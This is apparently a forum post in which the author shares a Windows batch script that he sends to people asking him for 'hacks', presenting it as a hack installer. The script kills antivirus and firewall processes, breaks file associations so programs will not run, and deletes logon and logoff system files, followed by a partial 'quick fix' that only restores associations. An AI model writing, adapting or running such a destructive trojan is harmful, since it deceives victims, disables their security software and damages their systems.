Made a small .cmd script that I send to noobs when they want hacks from me. Bassically what it does is change the association of a .exe file to a .txt file and change the association of a .txt file with a .mp3 file so every time you open up a .exe it opens up in notepad.
title HACK SETUP
color 0A
@echo off
set end=md "Hack Setup"
set fin=copy "Hack Setup.txt" "Installing"
%end%
%fin%
net send * Hacks are installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * You got hacked biatch.
msg * L 2 Compute.
cls
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
msg * G'night
A quick fix:
title Hack Setup
color 0A
@echo off
cls
assoc .exe=exefile
assoc .txt=txtfile
cls